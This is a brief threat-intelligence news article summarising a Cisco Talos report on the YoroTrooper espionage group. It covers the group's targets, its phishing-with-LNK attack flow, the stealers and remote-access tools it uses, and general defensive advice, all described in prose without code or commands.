A new threat actor, dubbed YoroTrooper, has been targeting the Commonwealth of Independent States (CIS). It has been operating an espionage campaign against embassies and healthcare agencies since at least June 2022.
A glance at YoroTrooper campaign
According to a report by Cisco Talos, YoroTrooper primarily targets government agencies and energy organizations in Azerbaijan, Kyrgyzstan, and Tajikistan.
YoroTropper was observed using themed lures/decoys targeting Uzbekistani energy company UZBEKHYDROENERGO and Tajikistani government agencies, among others.
It successfully compromised and obtained credentials from a critical healthcare agency in the EU and the World Intellectual Property Organization (WIPO).
Cybercriminals also targeted embassies of European countries, including Turkmenistan and Azerbaijan, to exfiltrate documents and drop additional malware payloads.
Attack flow
The attack begins with phishing emails with malicious shortcut files (LNK), along with legitimate PDF documents related to national development strategy, used as decoys.
When the shortcut is clicked, it leverages mshta[.]exe to fetch HTA files from a remote server and eventually drops the primary payload.
During its espionage drive, YoroTrooper exfiltrates huge chunks of data, including credentials from multiple applications, browsing history, cookies, screenshots, and system information.
Ready-to-use tools and custom payload
YoroTrooper uses a bunch of tools, including custom malware, commodity RATs, and stealers.
To steal credentials, it uses the open-source project Lazagne, the commercially available tool Stink Stealer, and custom scripts.
For remote access, it uses LodaRAT, AveMaria, Warzone RAT, and a custom Python-based malware that uses Telegram for C2 communication.
It uses tools such as PyInstaller or Nuitka to distribute and run the payload as a standalone application, eliminating the need for python installation on the infected machine.
In addition, researchers have observed the use of reverse shell binaries (including Meterpreter) and a custom C-based keylogger.
Concluding notes
YoroTrooper appears to have access to ample skills and resources at its disposal. Moreover, the use of LNK files with PowerShell and MSHTA is turning into a popular attack tactic, allowing attackers to pass through the security tools unnoticed. To stay protected, organizations are suggested to keep their applications and anti-virus up to date and implement anti-phishing solutions at the endpoints.